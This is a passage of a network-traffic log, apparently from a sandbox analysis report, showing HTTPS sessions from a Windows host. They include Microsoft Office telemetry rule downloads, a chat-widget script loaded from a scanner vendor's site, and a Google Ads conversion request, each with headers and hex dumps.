                                                                                                                                                                                              Data Ascii: DCD$"ICR<YadF@a[s86WSi$=;APXMT@}'*%ZN^Gp5W9xmU@B/pr9G 7DIb.%il>;MMh$>oOJy&^{k0[FnLDvQlL[L\59s:Q%|G(a*
                                                                                                                                                                                              2024-11-20 20:28:31 UTC1369INData Raw: 55 3f 91 58 cb 64 4e 19 24 28 09 ef e6 93 97 81 bc bc 84 ee 50 4e 5e 06 f2 f0 27 2a 82 72 a3 3b b9 41 3b b8 39 17 81 3b b8 39 17 81 a8 e4 04 45 40 44 5e 04 ee e0 4e e5 08 1f 1b fd 6d f1 6f 57 06 41 af 1d 82 91 7a c8 fa 8d 8e 4e fa c8 18 03 8b 17 2e 96 44 3a 67 86 85 a2 ce 60 d4 bd cb 9e de 72 11 92 b4 d4 b3 fa 38 f3 cc 91 cd da b6 6c d7 0c d4 7b a8 55 ce b3 a5 c2 cf 6b ad 2b 25 a9 4c b8 a3 d1 59 5f a4 42 18 71 ea cb e3 bd 5d 53 f1 42 7a 7e 7a 70 a8 f4 9f 26 0c e1 f4 e5 c7 cd 7e 8f 64 7d 37 aa 65 13 9a c1 28 38 d5 eb 64 2d 9f 58 58 ca d1 d0 26 53 63 5a 41 83 23 ca 12 2b b3 da d1 66 b7 d8 39 7a ea 51 57 91 ca a8 3e e5 e4 23 b9 c1 ce 57 07 39 48 08 e7 3c 1a f7 3c 18 e2 70 31 5c a0 d5 77 03 55 dc 09 dc a0 9d c8 0a 8a 81 dd dc 1d dd c0 9d dc 1c 8b c0 9c a8 1d
                                                                                                                                                                                              Data Ascii: U?XdN$(PN^'*r;A;9;9E@D^NmoWAzN.D:g`r8l{Uk+%LY_Bq]SBz~zp&~d}7e(8d-XX&ScZA#+f9zQW>#W9H<<p1\wU
                                                                                                                                                                                              2024-11-20 20:28:31 UTC1369INData Raw: 5a 08 38 8d 97 6d 14 11 e8 12 9e 8a 28 0d 79 3d 79 f2 98 b2 0a 35 1a 91 4c b2 2b 24 a4 56 d3 fa ac aa 8b 05 eb d7 bf 7d ef 7f 9d ef f1 bf 5d 94 f7 e6 a5 20 2f 8f 0e 31 f3 45 33 eb fd 2d 75 ad 01 99 be f9 ea f1 a1 81 d5 0a d0 38 0d 04 10 ec 23 d1 01 69 d0 15 3c b9 97 cb 0f c1 2a 70 91 bf e7 16 93 d0 71 2f ef 40 3d bf 1c 88 0f 8a 1c 3b 78 f3 b0 7f c5 9a 97 c6 f6 b5 06 04 e1 a3 d7 92 9c a4 40 68 07 04 10 47 a8 56 4d 46 23 52 a9 46 41 64 93 d5 d4 f4 f5 58 55 53 89 17 af 7e be 4f 93 d6 f7 bf 5e bf 3b ef 5d 63 44 d8 dc 96 26 fc 75 78 dd 9a 4f 8f 19 47 18 02 63 ad ad 14 02 00 ae 5b 37 1d c5 c7 62 7b 19 b7 ff 00 5f 0d 93 07 ad 00 7a 0e 5b 40 26 29 67 95 96 71 f9 3c 54 51 57 c3 e7 71 52 49 c0 2c 06 cc 10 4e 45 15 bf 5b df c7 4f 01 06 2c c5 24 32 45 3c 66 57 36 48
                                                                                                                                                                                              Data Ascii: Z8m(y=y5L+$V}] /1E3-u8#i<*pq/@=;x@hGVMF#RFAdXUS~O^;]cD&uxOGc[7b{_z[@&)gq<TQWqRI,NE[O,$2E<fW6H


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              110192.168.2.54985313.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:30 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:31 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 415
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                              ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                              x-ms-request-id: 7f65af6f-801e-0067-5f8c-3afe30000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202831Z-1777c6cb754b7tdghC1TEBwwa40000000aag000000000p19
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:31 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              111192.168.2.54985413.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:30 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:31 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 494
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB8972972"
                                                                                                                                                                                              x-ms-request-id: 65766a7e-a01e-0002-4f8c-3a5074000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202831Z-1777c6cb754vxwc9hC1TEBykgw0000000a40000000008643
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:31 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              112192.168.2.54985213.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:30 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:31 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 471
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                              x-ms-request-id: a24720e5-f01e-0096-3f65-3b10ef000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202831Z-185f5d8b95cdtclvhC1NYC4rmc0000000atg000000011be2
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:31 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              113192.168.2.549850192.229.233.344431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:30 UTC524OUTGET /jsclient/app.js HTTP/1.1
                                                                                                                                                                                              Host: static.olark.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                              Referer: https://ambir.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:31 UTC413INHTTP/1.1 200 OK
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Age: 5522
                                                                                                                                                                                              Cache-Control: max-age=10800
                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:31 GMT
                                                                                                                                                                                              Etag: W/"673d0962-def3"
                                                                                                                                                                                              Expires: Wed, 20 Nov 2024 23:28:31 GMT
                                                                                                                                                                                              Last-Modified: Tue, 19 Nov 2024 21:55:46 GMT
                                                                                                                                                                                              Server: ECS (lhd/35E1)
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                              X-Cache: HIT
                                                                                                                                                                                              Content-Length: 57075
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              2024-11-20 20:28:31 UTC16383INData Raw: 21 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 6f 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 73 2c 61 29 7b 69 66 28 21 6f 5b 73 5d 29 7b 69 66 28 21 74 5b 73 5d 29 7b 76 61 72 20 6c 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 26 26 72 65 71 75 69 72 65 3b 69 66 28 21 61 26 26 6c 29 72 65 74 75 72 6e 20 6c 28 73 2c 21 30 29 3b 69 66 28 69 29 72 65 74 75 72 6e 20 69 28 73 2c 21 30 29 3b 76 61 72 20 63 3d 6e 65 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 6d 6f 64 75 6c 65 20 27 22 2b 73 2b 22 27 22 29 3b 74 68 72 6f 77 20 63 2e 63 6f 64 65 3d 22 4d 4f 44 55 4c 45 5f 4e 4f 54 5f 46 4f 55 4e 44 22 2c 63 7d 76 61 72 20 75 3d 6f 5b 73 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 74 5b 73 5d 5b 30 5d 2e 63 61
                                                                                                                                                                                              Data Ascii: !function e(t,o,n){function r(s,a){if(!o[s]){if(!t[s]){var l="function"==typeof require&&require;if(!a&&l)return l(s,!0);if(i)return i(s,!0);var c=new Error("Cannot find module '"+s+"'");throw c.code="MODULE_NOT_FOUND",c}var u=o[s]={exports:{}};t[s][0].ca
                                                                                                                                                                                              2024-11-20 20:28:31 UTC1INData Raw: 66
                                                                                                                                                                                              Data Ascii: f
                                                                                                                                                                                              2024-11-20 20:28:31 UTC16383INData Raw: 74 28 29 29 29 2c 6f 2e 73 65 61 72 63 68 3d 65 2e 73 65 61 72 63 68 2c 6f 2e 71 75 65 72 79 3d 65 2e 71 75 65 72 79 2c 63 2e 69 73 4e 75 6c 6c 28 6f 2e 70 61 74 68 6e 61 6d 65 29 26 26 63 2e 69 73 4e 75 6c 6c 28 6f 2e 73 65 61 72 63 68 29 7c 7c 28 6f 2e 70 61 74 68 3d 28 6f 2e 70 61 74 68 6e 61 6d 65 3f 6f 2e 70 61 74 68 6e 61 6d 65 3a 22 22 29 2b 28 6f 2e 73 65 61 72 63 68 3f 6f 2e 73 65 61 72 63 68 3a 22 22 29 29 2c 6f 2e 68 72 65 66 3d 6f 2e 66 6f 72 6d 61 74 28 29 2c 6f 3b 69 66 28 21 62 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 6f 2e 70 61 74 68 6e 61 6d 65 3d 6e 75 6c 6c 2c 6f 2e 73 65 61 72 63 68 3f 6f 2e 70 61 74 68 3d 22 2f 22 2b 6f 2e 73 65 61 72 63 68 3a 6f 2e 70 61 74 68 3d 6e 75 6c 6c 2c 6f 2e 68 72 65 66 3d 6f 2e 66 6f 72 6d 61 74 28 29
                                                                                                                                                                                              Data Ascii: t())),o.search=e.search,o.query=e.query,c.isNull(o.pathname)&&c.isNull(o.search)||(o.path=(o.pathname?o.pathname:"")+(o.search?o.search:"")),o.href=o.format(),o;if(!b.length)return o.pathname=null,o.search?o.path="/"+o.search:o.path=null,o.href=o.format()
                                                                                                                                                                                              2024-11-20 20:28:31 UTC16383INData Raw: 6c 6c 28 61 2e 70 6c 75 67 69 6e 73 2e 6c 65 6e 67 74 68 3f 61 2e 70 6c 75 67 69 6e 73 3a 5b 5d 29 7d 63 61 74 63 68 28 65 29 7b 69 3d 5b 5d 7d 66 6f 72 28 76 61 72 20 77 3d 22 22 3b 69 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 79 3d 69 2e 70 6f 70 28 29 3b 79 2e 6e 61 6d 65 26 26 28 77 2b 3d 79 2e 6e 61 6d 65 29 2c 79 2e 64 65 73 63 72 69 70 74 69 6f 6e 26 26 28 77 2b 3d 79 2e 64 65 73 63 72 69 70 74 69 6f 6e 29 2c 79 2e 76 65 72 73 69 6f 6e 26 26 28 77 2b 3d 79 2e 76 65 72 73 69 6f 6e 29 7d 76 61 72 20 62 3d 30 3b 22 22 21 3d 3d 77 26 26 28 62 3d 6f 28 77 29 29 3b 76 61 72 20 6b 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 67 2f 33 29 2c 49 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 67 2f 34 29 3b 6c 28 29 26 26 28 6b 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 67 2f 32 29 2c
                                                                                                                                                                                              Data Ascii: ll(a.plugins.length?a.plugins:[])}catch(e){i=[]}for(var w="";i.length;){var y=i.pop();y.name&&(w+=y.name),y.description&&(w+=y.description),y.version&&(w+=y.version)}var b=0;""!==w&&(b=o(w));var k=Math.floor(g/3),I=Math.floor(g/4);l()&&(k=Math.floor(g/2),
                                                                                                                                                                                              2024-11-20 20:28:31 UTC7925INData Raw: 65 6d 2e 70 61 74 68 22 3a 41 2e 73 65 74 50 61 74 68 28 74 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 73 79 73 74 65 6d 2e 64 6f 6d 61 69 6e 22 3a 41 2e 73 65 74 44 6f 6d 61 69 6e 28 74 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 73 79 73 74 65 6d 2e 72 65 71 75 69 72 65 5f 73 65 63 75 72 65 5f 63 6f 6f 6b 69 65 73 22 3a 41 2e 73 65 74 53 65 63 75 72 65 28 74 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 73 79 73 74 65 6d 2e 61 6c 6c 6f 77 65 64 5f 64 6f 6d 61 69 6e 73 22 3a 69 66 28 74 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 61 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 6c 65 6e 67 74 68 2d 65 2e 6c 65 6e 67 74 68 7d 29 3b 66 6f 72 28 76 61 72 20 74 3d 73 2e 67 65 74 57 69 6e 64 6f 77
                                                                                                                                                                                              Data Ascii: em.path":A.setPath(t);break;case"system.domain":A.setDomain(t);break;case"system.require_secure_cookies":A.setSecure(t);break;case"system.allowed_domains":if(t.length){var a=function(e){e.sort(function(e,t){return t.length-e.length});for(var t=s.getWindow


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              114192.168.2.54985513.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:30 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:31 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                              x-ms-request-id: 657669b3-a01e-0002-118c-3a5074000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202831Z-1777c6cb7544nvmshC1TEBf7qc00000009yg000000007bf0
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:31 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              115192.168.2.54985113.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:30 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:31 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 499
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                              ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                              x-ms-request-id: 8157cc8d-f01e-0003-1961-3b4453000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202831Z-185f5d8b95cjbkr4hC1NYCeu240000000ah000000000xq5p
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:31 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              116192.168.2.549857172.217.17.344431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:31 UTC1156OUTGET /pagead/viewthroughconversion/1070729751/?random=1732134501018&cv=11&fst=1732134501018&bg=ffffff&guid=ON&async=1&gtm=45be4bj0v9180601725za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&hn=www.googleadservices.com&frm=0&tiba=Ambir%20Card%20Scanners%20-%20AMBIR%20Technology&npa=0&pscdl=noapi&auid=1093817975.1732134501&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4 HTTP/1.1
                                                                                                                                                                                              Host: googleads.g.doubleclick.net
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              Cookie: IDE=AHWqTUmoPit_wuKy5uGRDlv_X4wH6-FpAjFhJzRLblBcJp6k4iBGwdMdGwKz_xDr
                                                                                                                                                                                              2024-11-20 20:28:32 UTC703INHTTP/1.1 200 OK
                                                                                                                                                                                              P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:31 GMT
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                              Content-Type: text/javascript; charset=UTF-8
